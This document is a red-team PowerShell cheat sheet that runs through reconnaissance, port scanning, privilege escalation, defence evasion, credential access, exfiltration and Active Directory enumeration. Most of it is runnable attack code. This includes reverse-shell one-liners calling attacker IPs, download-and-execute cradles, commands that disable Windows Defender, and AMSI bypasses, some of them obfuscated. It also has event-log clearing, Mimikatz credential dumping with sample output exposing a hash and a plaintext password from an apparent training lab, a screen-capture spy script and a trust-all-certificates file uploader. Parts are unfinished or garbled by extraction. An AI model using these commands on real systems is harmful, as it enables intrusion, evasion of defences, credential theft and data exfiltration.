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1 Introduction

1.1 Running Powershell

1.1.1 Where to Find Powershell

Powershell Locations

```
C:\windows\syswow64\windowspowershell\v1.0\powershell
C:\Windows\System32\WindowsPowerShell\v1.0\powershell
```

1.1.2 Running Powershell as a Different User

Run Powershell prompt as a different user without loading profile to the machine [replace DOMAIN and USER]

```
runas /user:domain\user /noprofile powershell.exe
```

Or using the following script

```
$username = 'domain\user'
$password = 'password'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential
$username, $securePassword
Start-Process powershell.exe -Credential $credential
```

You can also execute any executable like reverseshell as the new user by replacing powershell.exe with another executable.

1.1.3 Running Powershell on Another System Remotely

Commect to a remote machine with the current user credentials

• Enter-PSSession -ComputerName machine01.domain.local

• Enter-PSSession -ComputerName machine01

Starts an interactive Powershell session with a remote computer.

```
$username = 'domain\user'
$password = 'password'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential
$username, $securePassword
Enter-PSSession -ComputerName Server01 -Credential $credential
```

Or invoke a command on a remote computer. Useful for testing

1.1.4 Loading Scripts and Modules

Load a Script (Dot Sourcing)

. C:\AD\Tools\PowerView.ps1

Load a Module

ImportModule C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.
psd1

List all commands in a module

```
Get-Command -Module <modulename>
```

1.1.5 9 Ways to Open Powershell

https://www.howtogeek.com/662611/9-ways-to-open-powershell-in-windows-10

2 Reconnaissance

2.1 Basic Machine Enumeration

- List users Get-LocalUser
- Basic networking information ipconfig /all
- file permissions
- · registry permissions
- scheduled and running tasks
- insecure files
- Print Domain systeminfo | findstr /B "Domain"
- Check Powershell version \$PSVersionTable. PSVersion
- List processes Get-Process

2.2 Find Files on Local Machine

2.2.1 Find Files

Find GPP Passwords in SYSVOL

```
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
```

TODO. Add more methods to find sensitive files.

2.3 Simple Enumeration Script

Paste the following code in a powershell console and it will present a menu for enumeration

```
Clear-Host
function Show-Menu
{
   param (
```

```
[string]$Title = 'PowEnum Menu'
    )
    Clear-Host
    Write-Host "======== $Title ========"
    Write-Host " "
    Write-Host "1: Press '1' to get OS Version"
    Write-Host "2: Press '2' to get FQDN"
    Write-Host "3: Press '3' to get domain"
    Write-Host "4: Press '4' to get DNS type All"
    Write-Host "5: Press '5' to get MX record"
    Write-Host "6: Press '6' to get WWW record"
    Write-Host "7: Press '7' to get hosts on subnet"
    Write-Host "Q: Press 'Q' to quit."
}
do
    Show-Menu âĂŞTitle 'PowEnum Menu'
    Write-Host " "
    $input = Read-Host "what do you want to do?"
    switch ($input)
    {
        '1' {
                systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
        '2' {
                ([System.Net.Dns]::GetHostByName(($env:computerName))).
                   Hostname
        131 {
                (Get-WmiObject Win32_ComputerSystem).Domain
        '4' {
                $Domain=(Get-WmiObject Win32_ComputerSystem).Domain
                Resolve-DNSName -type All -name $Domain
        '5' {
                $Domain=(Get-WmiObject Win32_ComputerSystem).Domain
                Resolve-DNSName -type MX -name $Domain
        '6' {
                $Domain=(Get-WmiObject Win32_ComputerSystem).Domain
                Write-Host "www.${Domain}"
                Resolve-DNSName -type cname -name "www.${Domain}"
        171 {
                Write-Host "Be patient, this could take some time..."
                $snet = Get-WmiObject -Class Win32_IP4RouteTable |
                    where { $_.destination -eq '0.0.0.0' -and $_.mask -eq
                       '0.0.0.0'}
                    Sort-Object metric1 | select nexthop, metric1,
```

2.4 Network Discovery

2.4.1 Ping Sweep Oneliner

Paste the following code in a Powershell console. It will ask for input.

```
write-host "Ping Sweep!"; $FirstThreeOctets = Read-Host -Prompt 'First
Three Octets (for example: 127.0.0)'; $FirstIP = Read-Host -Prompt '
Start IP (for example: 1)'; $LastIP = Read-Host -Prompt 'End IP (for
example: 254)'; $FirstIP..$LastIP | foreach-object { (new-object System
.Net.Networkinformation.Ping).Send($FirstThreeOctets + '.' + $_,150) }
| where-object {$_.Status -eq 'success'} | select Address; Write-Host '
Done!'
```

It will ask for input as shown

```
Ping Sweep!
First Three Octets (for example: 127.0.0): 10.33.132
Start IP (for example: 1): 1
End IP (for example: 254): 10
```

2.4.2 Port Scanning

2.4.2.1 Single Host Multiple Ports

```
1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.100", \) "Port \ is open!"} 2>$null
```

2.4.2.2 Single Port Multiple Hosts

```
foreach ($ip in 1..20){Test-NetConnection -Port 80 -InformationLevel "
Detailed"192.168.1.$ip}
```

2.4.2.3 Multiple Hosts Multiple Ports

```
1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).
Connect("10.0.0.$a",$_))"Port $_ is open!"} 2>$null}
```

2.4.3 Simple Port Scanning Script

Needs testing

```
$port = 445
$network = 10.63.50
$range = 1..254
$ErrorActionPreference= 'silentlycontinue'
$(Foreach ($add in $range)
{ $ip = "{0}.{1}" âĂŞF $network,$add
Write-Progress "Scanning Network" $ip -PercentComplete (($add/$range.Count )*100)

If(Test-Connection âĂŞBufferSize 32 âĂŞCount 1 âĂŞquiet âĂŞComputerName $ip)
{ $socket = new-object System.Net.Sockets.TcpClient($ip, $port)

If($socket.Connected) { "$ip port $port open"
$socket.Close() }
else { "$ip port $port not open" }
}
}) | Out-File .\portscan.csv
```

2.4.4 Advanced Port Scanning Script

Link https://raw.githubusercontent.com/BornToBeRoot/PowerShell_IPv4PortScanner/main/Scripts/IPv4PortScan.ps1 https://github.com/BornToBeRoot/PowerShell_IPv4PortScanner

Note - Yes, Nmap is better. However, you may find yourself in a situation where you cannot install nmap or anything else. # Execution

2.5 Reverse Shells

2.5.1 Reverse Shell - One-Liners

Modify the IP address and the port to the attacker's.

```
$client = New-Object System.Net.Sockets.TCPClient('192.168.46.2',443);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object - TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

or

```
$sm=(New-Object Net.Sockets.TCPClient('192.168.254.1',55555)).GetStream()
;[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0)
{;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
```

2.5.2 Reverse Shell - Powercat

Link https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

Reverse shell

```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http
://192.168.46.2/powercat.ps1');powercat -c 192.168.46.2 -p 443 -e cmd"
```

Encoded reverse shell

```
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http
   ://192.168.46.2/powercat.ps1');powercat -c 192.168.1.3 -p 443 -e cmd.
   exe -ge > encodedshell.ps1

cat encodedshell.ps1 | clip

powershell -E <PASTE>
```

2.5.3 Reverse Shell - Invoke-PowerShellTcp

Invoke-PowerShellTcp.ps1

Link https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

```
powershell iex (New-Object Net.WebClient).DownloadString('http://<
  yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse
  -IPAddress [IP] -Port [PortNo.]
```

2.5.4 Reverse Shell - MSFvenom

On Kali

```
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<port> -e
x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
```

On Target

```
powershell.exe -ExecutionPolicy Bypass -NoExit -File shell.ps1# Delivery
```

Yes. I know. Delivery is not on Mitre Att&ck Framework. However, downloading and uploading files is an absolute necessity during a Red Team engagement.

2.6 Download Files

2.6.1 Download and Run in Memory

```
powershell iex (New-Object Net.WebClient).DownloadString('http://<
   yourwebserver>/Invoke-PowerShellScript.ps1');Invoke-PowerShellScript -
   arg1 value -arg2 value
```

2.6.2 Download from SMB

```
Copy-Item -Source \\server\share\file -Destination C:\path\
```

2.6.3 Download in Powershell - WebClient

```
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("https://www.contoso.com/file","C:\path\file")
```

2.6.4 Download in Powershell - Easy Download

```
iwr ((New-Object Net.WebClient).DownloadString('http://172.16.100.87/
    PowerView.ps1'))
```

2.6.5 Download with Invoke-WebRequest

```
Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"
```

2.6.6 Download with Wget

```
wget "http://www.contoso.com" -outfile "file"
```

2.6.7 Download with Authentication

```
Invoke-WebRequest -Uri https://www.contoso.com/ -OutFile C:"\path\file" -
    Credential "yourUserName"
```

```
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://172.16.99.87/PowerView.ps1","C:\Program
Files (x86)\Jenkins\workspace\Project11\PowerView.ps1")
```

```
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://172.16.99.87/PowerView.ps1","C:\Users\
    student487\Downloads\PowerView.ps1")
```

```
iex (iwr http://172.16.99.87/Invoke-Mimikatz.ps1 -UseBasicParsing)
iwr http://172.16.99.87/SafetyKatz.exe -OutFile "C:\Program Files (x86)\
    Jenkins\workspace\Project11\SafetyKatz.exe"
iwr http://172.16.99.87/mimikatz.exe -OutFile "C:\Program Files (x86)\
    Jenkins\workspace\Project11\mimikatz.exe"

iwr http://172.16.99.87/Loader.exe -OutFile "C:\Program Files (x86)\
    Jenkins\workspace\Project11\Loader.exe"

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess2 = New-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
```

Invoke-command -ScriptBlock{Get-Process -IncludeUserName} -Session \$sess

```
Invoke-command -ScriptBlock{$ExecutionContext.SessionState.LanguageMode =
   "FullLanguage"} -Session $sess2
Invoke-command -ScriptBlock{whoami} -Session $sess
Authentication Id : 0 ; 64685 (00000000:0000fcad)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
                   : dcorp
Logon Server : DCORP-DC
Logon Time : 11/16/202
                   : 11/16/2021 8:50:08 PM
SID
                   : S-1-5-21-1874506631-3219952063-538504511-1122
    msv :
     [00000003] Primary
     * Username : svcadmin
     * Domain : dcorp
     * NTLM : b38ff50264b74508085d82c69794a4d8

* SHA1 : a4ad2cd4082079861214297e1cae954c906501b9

* DPAPI : fd3c6842994af6bd69814effeedc55d3
    tspkg:
    wdigest:
     * Username : svcadmin
     * Domain : dcorp
     * Password : (null)
    kerberos:
     * Username : svcadmin
     * Domain : DOLLARCORP.MONEYCORP.LOCAL
     * Password : *ThisisBlasphemyThisisMadness!!
    ssp:
    credman :
$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http
    ://172.16.99.87/SafetyKatz.exe sekurlsa::ekeys exit
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4
   listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress
   =172.16.99.87"
```

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iwr http://172.16.99.87/Loader.exe -OutFile C:\Users\Public\Loader.exe

```
iwr http://172.16.99.87/Rubeus.exe -OutFile C:\Users\Public\Rubeus.exe

echo Y | xcopy C:\Users\Public\Loader.exe \\dcorp-mgmt\C$\Users\Public\
    Loader.exe

$null | winrs -r:dcorp-mgmt C:\Users\Public\Loader.exe -path http
    ://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

3 Privilege Escalation

3.1 PowerUp.ps1

Link https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1

Download and run from attacker's machine

```
powershell iex (New-Object Net.WebClient).DownloadString('http://<
   yourwebserver>/PowerUp.ps1');Invoke-AllChecks
```

Download and run from internet

powershell iex (New-Object Net.WebClient).DownloadString('https://raw.
 githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/
 PowerUp.ps1');Invoke-AllChecks

4 Defense Evasion

4.1 Bypassing Execution Policy

```
powershell -ExecutionPolicy bypass
powershell -c <cmd>
powershell -encodedcommand $env:PSExecutionPolicyPreference="bypass"
```

4.2 Windows Defender

4.2.1 Disable Windows Defender

In PowerShell, the following 2 commands with Admin privilege:

```
Set-MpPreference -DisableRealtimeMonitoring $true -force
Set-MpPreference -DisableIOAVProtection $true
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender
" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
```

4.3 Path Exclusion

Check that path from which Windows Defender allows execusion.

```
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
```

4.4 Windows Firewall

4.4.1 Creating rules

TODO

4.5 Bypass AMSI

Article showing multiple methods https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/

AMSI is short for Antimalware Scan Interface.

The goal of AMSI is to prevent the execution of arbitrary code containing malicious content.

4.5.1 Basic - Forcing an AMSI Initialization Failure

Likely detectable

```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('
amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

Base64 Encoded

```
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::
    Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA
    ')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::
    FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'
    NonPublic,Static').SetValue($null,$true)
```

4.5.2 Obfuscation

4.5.2.1 Obfuscated Command 1

```
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','
    rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`
    Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','
    utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','
    InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."
    sE`T`VaLUE"( ${n`ULl},${t`RuE} )
```

4.5.2.2 Obfuscated Command 2

4.5.3 Invoke-AMSIBypass

https://raw.githubusercontent.com/samratashok/nishang/master/Bypass/Invoke-AmsiBypass.ps1

```
. .\Invoke-AmsiBypass.ps1
```

Or copy the code from github and paste it directly into the powershell console

```
Invoke-AmsiBypass -Verbose
```

4.6 Invisi-Shell

Project https://github.com/OmerYa/Invisi-Shell

Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.

Paste in cmd or run as .bat

4.6.1 RunWithPathAsAdmin.bat

```
set COR_ENABLE_PROFILING=1
set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
set COR_PROFILER_PATH=%~dp0InvisiShellProfiler.dll

powershell
set COR_ENABLE_PROFILING=
set COR_PROFILER=
set COR_PROFILER=
```

4.6.2 RunWithRegistryNonAdmin.bat

```
powershell

set COR_ENABLE_PROFILING=
set COR_PROFILER=
REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
```

4.7 Downgrading PowerShell

Sometimes you need to downgrade powershell as new versions come are more secure

```
powershell.exe -version 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Version 2
checking version
$PSVersionTable
```

4.8 Powershell Obfuscators

Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.

https://github.com/danielbohannon/Invoke-Obfuscation

Invoke-Stealth is a Simple & Powerful PowerShell Script Obfuscator.

https://github.com/JoelGMSec/Invoke-Stealth

Powerob An on-the-fly Powershell script obfuscator meant for red team engagements.

Tutorial https://medium.com/@ammadb/invoke-obfuscation-hiding-payloads-to-avoid-detection-87de291d61d3

https://github.com/cwolff411/powerob

4.9 Scanning Scripts for Detection

4.9.1 DefenderCheck

https://github.com/matterpreter/DefenderCheck

4.9.2 AMSITrigger

https://github.com/RythmStick/AMSITrigger

4.10 Clear Event Logs

Clean up after yourself

Required admin privilege

Expected output

```
Max(K) Retain OverflowAction
                                            Entries Log
15,168 0 OverwriteAsNeeded
15,168 0 OverwriteAsNeeded
                                                 0 Application
15,168 0 OverwriteAsNeeded
512 7 OverwriteOlder
20,480 0 OverwriteAsNeeded
                                                 0 DFS Replication
                                                  0 DxStudio
                                                0 Hardware Events
             7 OverwriteOlder
512
                                                 0 Internet Explorer
20,480 0 OverwriteAsNeeded
16,384 0 OverwriteAsNeeded
16,384 0 OverwriteAsNeeded
                                               0 Key Management Service
                                                 0 Microsoft Office Diagnostics
                                                 0 Microsoft Office Sessions
30,016 0 OverwriteAsNeeded
15,168 0 OverwriteAsNeeded
                                                  1 Security
                                                  2 System
           0 OverwriteAsNeeded
15,360
                                                   0 Windows PowerShell
```

5 Credential Access

5.1 Mimikatz

```
# Invoke-Mimikatz: Dump credentials from memory

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).
    DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).
    DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env: computername with target server name(s)]

powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).
    DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env: COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
```

5.2 Dump Hashes

Dump hashes if you have admin privilege

https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1Check this https://cheats.philkeeble.com/active-directory/lateral-movement# Collection

5.3 Snapshots

The following script takes a screenshot of the system and saves it to a given path.

You may modify the following script and schedule it to take screenshots every x number of minutes.

Note: The following script was written by the author.

```
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
[void] [System.Reflection.Assembly]::LoadWithPartialName("System.Windows.
   Forms")
$path=$args[0]
function screenshot($path)
    \ $width = 0;
    $height = 0;
    $workingAreaX = 0;
    $workingAreaY = 0;
    $screen = [System.Windows.Forms.Screen]::AllScreens;
    foreach ($item in $screen)
        if($workingAreaX -gt $item.WorkingArea.X)
            $workingAreaX = $item.WorkingArea.X;
        }
        if($workingAreaY -gt $item.WorkingArea.Y)
            $workingAreaY = $item.WorkingArea.Y;
        }
        $width = $width + $item.Bounds.Width;
        if($item.Bounds.Height -gt $height)
            $height = $item.Bounds.Height;
   }
    $bounds = [Drawing.Rectangle]::FromLTRB($workingAreaX, $workingAreaY,
       $width, $height);
    $bmp = New-Object Drawing.Bitmap $width, $height;
    $graphics = [Drawing.Graphics]::FromImage($bmp);
    $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty,
       $bounds.size);
    $bmp.Save($path);
    $graphics.Dispose();
    $bmp.Dispose();
    echo "Image saved !!"
   echo $path
echo 'USAGE: ./screenshot.ps1 "C:\Users\Public\image.png"'
screenshot($path)
```

5.4 Keylogger

TODO

5.5 Zipping files and directories

5.5.1 Zipping

Compress-Archive -Path C:\path\to\file*.jpg -DestinationPath C:\path\to\
archive.zip

5.5.2 Unzipping

Expand-Archive -LiteralPath 'C:\Archives\Draft[v1].Zip'-DestinationPath C:\
Reference

5.6 Encryption

5.6.1 Creating encryption key

```
$EncryptionKeyBytes = New-Object Byte[] 32
[Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes(
    $EncryptionKeyBytes)
$EncryptionKeyBytes | Out-File "./encryption.key"
```

5.6.2 Encrypting file

```
$FileContent = Get-Content ".\file.txt"
$EncryptionKeyData = Get-Content "./encryption.key"
$secureString = ConvertTo-SecureString $FileContent -AsPlainText -Force
$Encrypted = ConvertFrom-SecureString -SecureString $secureString -Key
$EncryptionKeyData | Out-File -FilePath "./secret.encrypted"
```

5.6.3 Decrypting file

```
$EncryptionKeyData = Get-Content "./encryption.key"
$PasswordSecureString = Get-Content "./secret.encrypted" | ConvertTo-
    SecureString -Key $EncryptionKeyData
$PlainTextPassword = [System.Runtime.InteropServices.Marshal]::
    PtrToStringBSTR([System.Runtime.InteropServices.Marshal]::
    SecureStringToBSTR($PasswordSecureString))
$PlainTextPassword | Out-File -FilePath ./plaintext.txt
$PlainTextPassword
```

5.7 Deleting files

You may want to clean up after yourself.

```
Remove-Item C:\Test\*.*Remove-Item C:\Users\Public\*.*
```

6 Command and Control

- **6.1 Covenant**
- 6.2 Empire

7 Exfiltration

7.1 Exfiltration Over HTTP(S)

7.1.1 The Server - Python

 Download Python HTTPS Server with Authentication ADDLINK

2. Create certificate

Create a certificate so you can use SSL

```
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
```

3. Start the server

Usage:

```
python simple-https-server.py 4433 admin:password
```

7.1.2 The Client - Powershell

1. Create upload.ps1

```
add-type @"
using System.Net;
using System.Security.Cryptography.X509Certificates;
public class TrustAllCertsPolicy : ICertificatePolicy {
  public bool CheckValidationResult(
    ServicePoint srvPoint, X509Certificate certificate,
    WebRequest request, int certificateProblem) {
    return true;
    }
}
"@
[System.Net.ServicePointManager]::CertificatePolicy = New-Object
    TrustAllCertsPolicy
```

```
echo "
  ______
echo "USAGE: ./upload.ps1 https://domain.com/ username:password
  file_to_upload"
echo "-"
echo "NOTE: script and file to be uploaded must be in the same directory"
  ______
$url=$args[0]
$auth=$args[1]
$filename=$args[2]
$encodedCreds = [System.Convert]::ToBase64String([System.Text.Encoding]::
  ASCII.GetBytes($auth))
$WebClient = new-object System.Net.WebClient
$WebClient.Headers.Add("Authorization", "Basic " + $encodedCreds)
$WebClient.Headers.Add("X-Atlassian-Token", "nocheck")
$WebClient.UploadFile($url, (Get-Location).Path + "\" + $filename)
```

2. Upload files to server

```
./upload.ps1 <https://ip:port/> <admin:password> <file (in current dir)>
./upload.ps1 https://192.168.46.1:4433/ admin:password file_to_upload
```

8 Impact

8.1 Enable Disable and Stop Services

8.1.1 General

TODO

8.1.2 RDP

Enable RDP

Requires admin privileges

Enable the remote desktop protocol

```
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections"-value 0
```

Enable remote desktop through the Windows Firewall

Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Disable RDP

Disable the remote desktop protocol

```
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections"-value 1
```

Disable remote desktop through the Windows Firewall

Disable-NetFirewallRule -DisplayGroup "Remote Desktop"

9 Active Directory

9.1 Enumeration

9.1.1 Basic Enumeration

All from Powershell

- Local user net user
- List local admins net local group Administrators
- List all domain user net user /domain
- List all domain groups net gourp /domain
- List users in Domain Admin group net group "Domain Admins"/domain
- Domain and DC [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain ()
- DC hostname cmd.exe /c "echo %logonserver%"

9.1.2 PowerView.ps1

9.1.2.1 Download PowerView.ps1

Link

https://raw.githubusercontent.com/ZeroDayLab/PowerSploit/master/Recon/PowerView.ps1

Or

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Download and run from attacker's machine

```
powershell iex (New-Object Net.WebClient).DownloadString('http://<
   yourwebserver>/PowerUp.ps1');Invoke-AllChecks
```

Download and run from internet

```
powershell iex (New-Object Net.WebClient).DownloadString('https://raw.
    githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/
    PowerUp.ps1');Invoke-AllChecks
```

Load PowerView . ./PowerView.ps1

9.1.2.2 Domain Controller

• Get-DomainController

9.1.2.3 Users

- Get all users Get-DomainUser
- Getallusersusernames Get-DomainUser | select -ExpandProperty samaccountname
- Get users with highest number of logon GetDomainUser -Properties samaccountname, logoncount

Search for users whose desrcription contains keywords

Get local users

```
Get-DomainUser -LDAPFilter "Description=*built*"| Select name, Description
Get passwords in description
Get-DomainUser -LDAPFilter "Description=*password*"| Select name, Description
```

9.1.2.4 Computers

• List all computers Get-DomainComputer | select -ExpandProperty dnshostname

9.1.2.5 Groups

AdminGroup

• Get-DomainGroup *admin* | **select** samaccountname

Domain Admins

 Show details of Domain Admins group Get-DomainGroup -Identity "Domain Admins"-Recurse

• List members of Domain Admins gourp Get-DomainGroupMember -Identity "Domain Admins" | select -ExpandProperty MemberName

Enterprise Admins

- Show details of Enterprise Admins group Get-DomainGroup -Identity "Enterprise Admins"
- List members of Enterprise Admins gourp Get-DomainGroupMember -Identity "
 Enterprise Admins" | select -ExpandProperty MemberName

• Get-DomainGroup "username" | select name

9.1.2.6 OUs

9.1.2.7 GPUs

9.1.3 ADModule

9.2 Find Where Current User Has Local Admin

9.2.1 Find-PSRemotingLocalAdminAccess.ps1

- Where to find this script
- . ./Find-PSRemotingLocalAdminAccess.ps1
- Find-PSRemotingLocalAdminAccess Output will be list of machines where the current user has admin access

9.2.2 Connect Using winrs

• CMD winrs -r:machine01 cmd

^{**} Groups user belongs to **